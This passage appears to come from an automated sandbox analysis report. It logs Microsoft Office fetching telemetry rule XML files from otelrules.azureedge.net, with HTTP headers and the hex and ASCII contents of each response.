                                                  2024-10-31 19:50:47 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  79192.168.2.45239113.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:47 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:47 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:47 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 432
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                  ETag: "0x8DC582BAABA2A10"
                                                  x-ms-request-id: e65a25e2-e01e-00aa-5b74-2aceda000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195047Z-15b8d89586fpccrmgpemqdqe5800000004z00000000017h8
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:47 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  80192.168.2.45239313.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:47 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:47 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:47 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 427
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                  ETag: "0x8DC582BB464F255"
                                                  x-ms-request-id: 48ec36c7-d01e-00a1-338d-2735b1000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195047Z-16849878b782d4lwcu6h6gmxnw00000009qg000000009srx
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:47 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  81192.168.2.45239413.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:47 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:47 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:47 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 474
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                  ETag: "0x8DC582BA4037B0D"
                                                  x-ms-request-id: 6c7ab4fb-501e-0078-78bf-2706cf000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195047Z-17c5cb586f67hfgj2durhqcxk800000008w000000000h6vb
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:47 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  82192.168.2.45239613.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:47 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:48 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:48 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B984BF177"
                                                  x-ms-request-id: dbd91de3-001e-002b-2827-2799f2000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195048Z-17c5cb586f626sn8grcgm1gf8000000008fg000000009358
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:48 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  83192.168.2.45239513.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:47 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:48 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:47 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                  ETag: "0x8DC582BA6CF78C8"
                                                  x-ms-request-id: 9f581369-601e-00ab-15c9-2a66f4000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195047Z-16849878b78fkwcjkpn19c5dsn000000092g000000005nqs
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:48 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  84192.168.2.45239713.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:47 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:48 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:48 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 405
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                  ETag: "0x8DC582B942B6AFF"
                                                  x-ms-request-id: 9577fd14-901e-0016-4fa3-26efe9000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195048Z-15b8d89586fpccrmgpemqdqe5800000004w00000000099z6
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:48 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  85192.168.2.45239813.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:48 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:48 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:48 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 468
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                  ETag: "0x8DC582BBA642BF4"
                                                  x-ms-request-id: e0a2f103-c01e-007a-3367-28b877000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195048Z-15b8d89586flspj6y6m5fk442w0000000fvg00000000mhwx
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:48 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  86192.168.2.45239913.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:48 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:48 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:48 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 174
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                  ETag: "0x8DC582B91D80E15"
                                                  x-ms-request-id: 2034bdf9-701e-003e-3056-2679b3000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195048Z-16849878b78x44pv2mpb0dd37w00000001z0000000012ayx
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:48 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  87192.168.2.45240013.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:48 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:48 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:48 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1952
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                  ETag: "0x8DC582B956B0F3D"
                                                  x-ms-request-id: bb28544f-801e-0047-7562-267265000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195048Z-16849878b78j5kdg3dndgqw0vg0000000bp000000000ndx7
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:48 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  88192.168.2.45240113.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:48 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:48 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:48 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 958
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                  ETag: "0x8DC582BA0A31B3B"
                                                  x-ms-request-id: 080ba15e-001e-0082-732b-275880000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195048Z-16849878b78qfbkc5yywmsbg0c00000009p000000000fn2q
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:48 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  89192.168.2.45240213.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:48 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:49 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:48 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 501
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                  ETag: "0x8DC582BACFDAACD"
                                                  x-ms-request-id: 97ce691d-801e-0047-0a01-277265000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195048Z-16849878b7898p5f6vryaqvp580000000aqg00000000yp71
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
